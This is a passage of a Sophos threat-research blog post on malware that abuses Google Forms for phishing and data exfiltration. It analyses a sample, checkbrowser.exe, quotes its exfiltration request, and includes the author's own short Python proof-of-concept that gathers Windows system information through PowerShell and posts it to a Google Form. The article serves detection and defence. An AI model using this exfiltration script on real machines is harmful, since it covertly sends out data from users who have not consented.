<a href="https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png"><img loading="lazy" class="alignnone wp-image-78336 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png" alt="" width="662" height="681" srcset="https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png 662w, https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png?resize=292,300 292w, https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png?resize=32,32 32w, https://news.sophos.com/wp-content/uploads/2021/09/snaptube-1.png?resize=50,50 50w" sizes="(max-width: 662px) 100vw, 662px" /></a></p>
<p>In these cases, the Google Forms page is displayed. However, we discovered some potentially unwanted applications targeting Windows users that used Google Forms pages surreptitiously, assembling web requests programmatically and sending data without user interaction. We also found evidence of PowerShell scripts interacting with Google Forms in our telemetry.</p>
<p>One sample we observed explicitly using Google Forms for data exfiltration was an executable named checkbrowser.exe. This file was delivered from a domain that appears to have hosted a compromised Italian language WordPress blog (tecnopc.info). It is an AutoIT compiled script that delivers browser extensions and a DLL.</p>
<p>When executed, the program modifies Windows&#8217; certificate trust list, and makes changes related to the Remote Access Service API, and removes settings in the Windows registry related to Internet proxy settings and other Internet security policies.<br />
<a href="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser-1.png"><img loading="lazy" class="alignnone wp-image-78337 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser-1.png" alt="" width="764" height="364" srcset="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser-1.png 764w, https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser-1.png?resize=300,143 300w" sizes="(max-width: 764px) 100vw, 764px" /></a>In addition to these things, the AutoIT script also collects system data, including language settings, mouse settings, and machine name. These appear to be part of sandbox evasion and to prevent execution in certain locales. It then exports some system information through a secure HTTP request to docs.google.com that take the format of a Google Forms submission.</p>
<p>I intercepted the request using Fiddler, and was able to get the URI for the form. A little bit of reformatting the request provided a look at the form itself:<br />
<a href="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser_form-1.png"><img loading="lazy" class="alignnone wp-image-78338 size-large" src="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser_form-1.png?w=640" alt="" width="640" height="565" srcset="https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser_form-1.png 896w, https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser_form-1.png?resize=300,265 300w, https://news.sophos.com/wp-content/uploads/2021/09/checkbrowser_form-1.png?resize=768,678 768w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p>The fields in the form (&#8220;client name&#8221;, computer name, user name, operating system version, Internet Explorer version) match up to the content in the POST request sent to the form:</p>
<pre>GET /forms/d/16LSwmJnCIOAuNnOD631ki0wfe_4eu_PWMbCEI_6Uh24/formResponse?entry.1633051194=[user name if detected]&amp;entry.1018322823=[computer name]&amp;entry.328100715=[user name]&amp;entry.1878239517=[Windows version]&amp;entry.1356961775=[Internet Explorer version number] HTTP/1.1</pre>
<p>The numbers of each entry in the GET request match up to numbers associated with the containers for each field in the remote form, as part of an array containing the parameters for the form object.. For example, the &lt;div&gt; tag surrounding the entry for &#8220;client name&#8221; is:</p>
<pre>&lt;div jsmodel="CP1oW" data-params="%.@.[321264449,"Nome Cliente";,null,0,[[1633051194,[],false,[],[],null,null,null,null,null,[null,[]]]],null,null,null,[]]......</pre>
<p>The first element of the array is the entry ID, 1633051194, which matches with the parameter in the GET request. In the cases we observed and in our testing, the value for this field was always &#8220;Sconosciuto&#8221; (Italian for &#8220;unknown&#8221;).</p>
<p>A similar strategy in another malware I found using a Russian-language Google form for exfiltration used a <em>curl</em> command to execute the post, posting video adapter, screen resolution and processor data.</p>
<h3>Roll your own Google Forms exfiltration</h3>
<p>To help understand how to hunt this sort of programmatic abuse of Google Forms, I decided to do some abusing of my own. All that&#8217;s required is a burnable Google account, a purpose-built form, and code to grab local system data and paste it into an HTML POST request.</p>
<p>I created a form with my Google account, and then opened the form with Firefox&#8217;s developer tools to identify the form entry identification numbers. A</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png"><img loading="lazy" class="alignnone wp-image-78326 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png" alt="" width="640" height="407" srcset="https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png 1092w, https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png?resize=300,191 300w, https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png?resize=768,488 768w, https://news.sophos.com/wp-content/uploads/2021/09/tellmeabouttherabbits.png?resize=1024,651 1024w" sizes="(max-width: 640px) 100vw, 640px" /></a>To get the actual form submission format, I entered some test data, and viewed the data from Firefox&#8217;s console:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/rabbits-form-post.png"><img loading="lazy" class="alignnone size-full wp-image-78327" src="https://news.sophos.com/wp-content/uploads/2021/09/rabbits-form-post.png" alt="" width="374" height="271" srcset="https://news.sophos.com/wp-content/uploads/2021/09/rabbits-form-post.png 374w, https://news.sophos.com/wp-content/uploads/2021/09/rabbits-form-post.png?resize=300,217 300w" sizes="(max-width: 374px) 100vw, 374px" /></a>The only necessary form data are the ones named &#8220;entry.[number]&#8221; — you don&#8217;t have to include the others in your POST request.</p>
<p>With the proper form entry IDs identified, I wrote a quick Python script to scrape some Windows system information and and dump it to the form. Using Python&#8217;s subprocess library, I passed some PowerShell commands to the operating system:</p>
<div>
<pre>import requests, os, sys, subprocess

result1 = subprocess.run('powershell Get-ComputerInfo "*version"', stdout=subprocess.PIPE)

result2 = subprocess.run('powershell Get-CimInstance -ClassName Win32_ComputerSystem', stdout=subprocess.PIPE)

result3 = subprocess.run('powershell whoami', stdout=subprocess.PIPE)

url = 'https://docs.google.com/forms/d/e/[Google Forms app ID]/formResponse'

exfil = {'entry.[first entry ID number]': result1, 'entry.[second entry ID number]' : result2, 'entry.[third entry ID number]' : result3}

x = requests.post(url, data = exfil)

print(x.text)</pre>
<p>The print command returns the HTML result of the POST.</p>
<p>The data passed to the form can be viewed in its associated spreadsheet:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png"><img loading="lazy" class="alignnone size-full wp-image-78328" src="https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png" alt="" width="640" height="327" srcset="https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png 1296w, https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png?resize=300,153 300w, https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png?resize=768,393 768w, https://news.sophos.com/wp-content/uploads/2021/09/rabbit-results.png?resize=1024,524 1024w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
</div>
<p>With just a few lines of script, I had a (very rough) functional exfiltration tool. This could easily be executed completely in PowerShell, or in any other scripting language.</p>
<h3>Ease of misuse</h3>
<p>While the vast majority of Google Forms abuse remains in the low-skill phishing and fraud spam space, the potential for its use in data exfiltration and malware command and control remains high — if only because it is so easy to implement. While Google frequently closes accounts associated with high-volume abuse of applications, including Forms, targeted use of Forms by malware could go undetected.</p>
<p>We&#8217;ve seen growing abuse of Google and other legitimate cloud services by malware actors, and it&#8217;s easy to understand why: they&#8217;re widely trusted by organizations, they&#8217;re secured with TLS, and they&#8217;re essentially free infrastructure.</p>
<p>Sophos products defend against most malicious spam that carry Forms-based phishing campaigns, and detect the behaviors of system information collection and exfiltration within the technique used in the malware and sample discussed here.  But email users should remain vigilant to attempts to use links to Google Forms (or other legitimate services) to obtain credentials. And organizations should not inherently trust  TLS traffic to &#8220;known good&#8221; domains such as docs.google.com.</p>
<h4>SophosLabs acknowledges Jagadeesh Chandaraiah for his contribution to this report.</h4>
			</div>
	<div class="mt-12">
		
<ul
	id="social-sharing"
	class="flex justify-center items-center space-x-6"
>
	<li class="facebook">
		<a
			class="js-share-modal"
			href="http://www.facebook.com/share.php?u=https://news.sophos.com/?p=78023&#038;title=Phishing%20and%20malware%20actors%20abuse%20Google%20Forms%20for%20credentials,%20data%20exfiltration"
			data-title="Phishing and malware actors abuse Google Forms for credentials, data exfiltration"
			title="Share on Facebook">
				<span class="sr-only">Share on Facebook</span>
				<svg
					width="8"
					height="16"
					xmlns="http://www.w3.org/2000/svg"
					class="text-sophos-gray-600 hover:text-black"
					fill="currentColor"
				>
					<path d="M7.145 8.006H4.903V16H1.581V8.006H0V5.182h1.581V3.354C1.581 2.045 2.202 0 4.933 0l2.461.01v2.742H5.608c-.291 0-.705.145-.705.77v1.66h2.533l-.291 2.824z" fill-rule="nonzero"/>
				</svg>
		</a>
	</li>
	<li class="twitter">
		<a
			class="js-share-modal"
			href="http://twitter.com/intent/tweet?text=Phishing%20and%20malware%20actors%20abuse%20Google%20Forms%20for%20credentials%2C%20data%20exfiltration%20https%3A%2F%2Fnews.sophos.com%2F%3Fp%3D78023"
			data-title=""
			title="Share on Twitter">
				<span class="sr-only">Share on Twitter</span>
				<svg
					width="14"
					height="13"
					xmlns="http://www.w3.org/2000/svg"
					class="text-sophos-gray-600 hover:text-black"
					fill="currentColor"
				>
					<path d="M12.567 3.238c.007.141.01.281.01.424 0 4.338-2.89 9.34-8.173 9.34-1.623 0-3.132-.543-4.403-1.475.225.03.453.045.685.045 1.346 0 2.584-.523 3.566-1.404-1.255-.028-2.317-.977-2.682-2.28a2.56 2.56 0 001.296-.056C1.554 7.53.562 6.203.562 4.613v-.04c.389.245.83.392 1.302.41C1.094 4.393.587 3.387.587 2.25c0-.602.142-1.166.388-1.65 1.416 1.986 3.534 3.292 5.92 3.43a3.735 3.735 0 01-.074-.749c0-1.813 1.286-3.28 2.873-3.28.825 0 1.572.397 2.096 1.034a5.324 5.324 0 001.824-.797c-.215.768-.67 1.41-1.263 1.816a5.178 5.178 0 001.65-.515 6.362 6.362 0 01-1.434 1.7" fill-rule="nonzero"/>
				</svg>
		</a>
	</li>
	<li class="linkedin">
		<a
			href="http://www.linkedin.com/shareArticle?mini=true&url=https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/"
			data-title="Phishing and malware actors abuse Google Forms for credentials, data exfiltration"
			title="Share on LinkedIn"
			onclick="window.open(this.href, '', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;">
			<span class="sr-only">Share on LinkedIn</span>
			<svg
				width="16"
				height="16"
				xmlns="http://www.w3.org/2000/svg"
				class="text-sophos-gray-600 hover:text-black"
				fill="currentColor"
			>
				<path d="M16 15.293h-3.43v-5.52c0-1.386-.496-2.334-1.738-2.334-.946 0-1.512.64-1.76 1.256-.09.22-.113.526-.113.836v5.762H5.53s.044-9.35 0-10.316h3.43v1.46c.456-.705 1.27-1.703 3.091-1.703 2.256 0 3.95 1.473 3.95 4.643v5.916zM1.917 3.566h-.022C.745 3.566 0 2.773 0 1.783 0 .772.768 0 1.94 0c1.173 0 1.896.772 1.917 1.783 0 .99-.744 1.783-1.94 1.783zM.202 15.293h3.431V4.977H.203v10.316z" fill-rule="nonzero"/>
			</svg>
		</a>
	</li>
	<li class="comments">
		<a
			href="#comments"
			title="Leave a Reply"
			class="flex items-center space-x-1"
		>
			<svg
				width="16"
				height="16"
				xmlns="http://www.w3.org/2000/svg"
				class="text-sophos-gray-600 hover:text-black"
				fill="currentColor"
			>
				<path d="M8.5 0a7.5 7.5 0 11-3.916 13.898C3.317 15.273 1.773 15.36.256 15.135c1.011-1.185 1.678-2.357 2-3.517l-.007.027A7.5 7.5 0 018.5 0z" fill-rule="evenodd"/>
			</svg>
					</a>
	</li>
</ul>

			</div><!-- .entry-social -->
	</div>

</article><!-- #post-## -->

			<div class="container my-8 md:my-16">
				<div class="max-w-4xl mx-auto">
					<div class="article-author-block article-co-authors-block">
	
					<div class="author-block">
				<div class="author-block__profile">
					<img width="400" height="400" src="https://news.sophos.com/wp-content/uploads/2020/02/sean-gallagher.jpg?w=400" class="avatar avatar-400 photo wp-post-image" alt="Sean Gallagher" />				</div> <!-- .author-profile -->

				<div class="author-block__wrapper">
					<div class="author-block__content">

													<div class="author-block__about">
								About the Author							</div>
						
						<h3 class="author-block__name">
						<a href="https://news.sophos.com/en-us/author/sean-gallagher/" title="Posts by Sean Gallagher" class="author url fn" rel="author">Sean Gallagher</a>						</h3>

						
							<div class="author-block__bio">
								<p>Sean Gallagher is a Senior Threat Researcher at Sophos. </p>
<p>Previously, Gallagher was IT and National Security Editor at Ars Technica, where he focused on information security and digital privacy issues, cybercrime, cyber espionage and cyber warfare. He has been a security researcher, technology journalist and information technology practitioner for over 20 years.</p>
							</div> <!-- .author-bio -->

					</div>
				</div>

			</div> <!-- .author-block-container -->
		
		</div>
				</div>
			</div>

			
<div class="pb-24 bg-white">
<div class="container">
<div class="max-w-5xl mx-auto">

			
			<h3 class="text-style-h2 md:my-8 my-4">
				Read Similar Articles			</h3>

			<div class="article-grid article-grid--3-column">
				<!-- Article -->
<article
	id="post-75410"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-75410 post type-post status-publish format-standard has-post-thumbnail hentry category-security-operations tag-encryption tag-mtr tag-ransomware tag-security tag-sidebar tag-sophos-rapid-response region-en-us">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2021/05/sophos-ransomware-web-banner-1200x628px-option-2.png?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				May 24, 2021			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/en-us/2021/05/24/what-to-expect-when-youve-been-hit-with-avaddon-ransomware/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">What to expect when you’ve been hit with Avaddon ransomware</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
<!-- Article -->
<article
	id="post-75301"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-75301 post type-post status-publish format-standard has-post-thumbnail hentry category-products-services tag-intercept-x tag-sidebar tag-sophos-edr tag-sophos-xdr region-en-us">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/en-us/2021/05/19/whats-new-in-sophos-edr-4-0/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2021/05/sophos-edr-news-blog-image-838x440px@2x.png?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				May 19, 2021			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/en-us/2021/05/19/whats-new-in-sophos-edr-4-0/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">What&#8217;s New in Sophos EDR 4.0</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
<!-- Article -->
<article
	id="post-75396"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-75396 post type-post status-publish format-standard has-post-thumbnail hentry category-products-services tag-sidebar tag-sophos-xdr tag-xdr region-en-us">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/en-us/2021/05/19/sophos-xdr-driven-by-data/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2021/05/sophos-xdr.png?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				May 19, 2021			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/en-us/2021/05/19/sophos-xdr-driven-by-data/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">Sophos XDR: Driven by data</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
			</div>

	
</div>
</div>
</div> <!-- #secondary -->

			
<div class="bg-sophos-gray-50 px-4 pt-16 pb-8" id="comments">

	
	
	<div class="container max-w-2xl py-6 md:py-16">
			<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://news.sophos.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name</label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" /></p>
<p class="comment-form-email"><label for="email">Email</label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<input type="hidden" name="redirect_to" value="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/" id="redirect_to"><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='78023' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="082e783377" /></p><input type="hidden" id="ak_js" name="ak_js" value="64"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
		</div>

</div><!-- #comments -->
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->


	</div> <!-- #content -->

	

	<footer
		class="bg-white border-t border-sophos-gray-200 "
		x-data="{ languageMenu: false, privacyMenu: false, legalMenu: false }"
	>
		<div class="container">
			<div class="md:flex-row md:items-center flex flex-col justify-between py-8">
				<div class="flex items-baseline flex-grow space-x-6">
					<!-- Language -->
					
<div class="relative mr-auto">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="languageMenu = !languageMenu"
		@click.away="languageMenu = false"
	>
		Change Region		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': languageMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>

	<!-- Language Menu -->
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="languageMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
											<li>
					<a href="https://news.sophos.com/es-419">
						América Latina					</a>
				</li>
															<li>
					<a href="https://news.sophos.com/pt-br">
						Brasil					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/de-de">
						Deutschland					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/en-us">
						English					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/fr-fr">
						France					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/es-es">
						Iberia					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/it-it">
						Italia					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/ja-jp">
						Japan					</a>
				</li>
									</ul>
	</div>
</div>

					<!-- Terms -->
					<a
						href="https://www.sophos.com/en-us/legal/sophos-website.aspx"
						class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block ml-auto text-xs font-medium leading-tight"
						>Terms</a
					>

					<!-- Privacy -->
					
<span class="relative">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="privacyMenu = !privacyMenu"
		@click.away="privacyMenu = false"
	>
		Privacy
		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': privacyMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="privacyMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/sophos-group-privacy-policy.aspx"
				>
					Privacy Notice				</a>
			</li>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/cookie-information.aspx"
				>
					Cookies				</a>
			</li>
		</ul>
	</div>
</span>

					<!-- Legal -->
					
<span class="relative">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="legalMenu = !legalMenu"
		@click.away="legalMenu = false"
	>
		Legal
		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': legalMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="legalMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal.aspx"
				>
					General				</a>
			</li>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/modern-slavery-act-transparency-statement.aspx"
				>
					Modern Slavery Statement				</a>
			</li>
			<li>
				<a
					href="https://secure.ethicspoint.eu/domain/media/en/gui/104916/index.html"
				>
					Speak Out				</a>
			</li>
		</ul>
	</div>
</span>

					<!-- Copyright -->
					<div class="md:ml-6 mt-2 md:mt-0">
						<span
							class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
						>
							&copy; 1997 - 2021 Sophos Ltd. All rights reserved						</span>
					</div>
				</div>
			</div>
			</div>
		</div>
	</footer>
	<script id='sophos-js-core-js-extra'>
var PG8Data = {"startPage":"1","maxPages":"1","nextLink":""};
</script>
<script type='text/javascript' src='https://news.sophos.com/_static/??-eJyVjFEOAiEMBS8kVCBRf4xnIaTZBaUltLoeX8xeYEma9zGZKWzNJCZFUtAVKwoIt5WFcBPjz+4KRcYNiZ8Zzcdbb90Adge2yAkO/UjcJ2z8ao9y3N+RfWt+zVcp1hbzQtNhi10J+3S3xOnkz0b0qHd3Ce4WwpjyA6B7oD0='></script>
<script src='https://cdn.jsdelivr.net/gh/alpinejs/alpine@v2.8.1/dist/alpine.min.js?ver=2.0.1' id='alpine-js-js'></script>
<script type='text/javascript' src='https://news.sophos.com/_static/??/wp-includes/js/comment-reply.min.js,/wp-includes/js/wp-embed.min.js,/wp-content/mu-plugins/akismet/_inc/form.js?m=1632410563j'></script>
<script src='https://stats.wp.com/e-202138.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:10.1',blog:'166161023',post:'78023',tz:'-4',srv:'news.sophos.com'} ]);
	_stq.push([ 'clickTrackerInit', '166161023', '78023' ]);
</script>
</body>
</html>
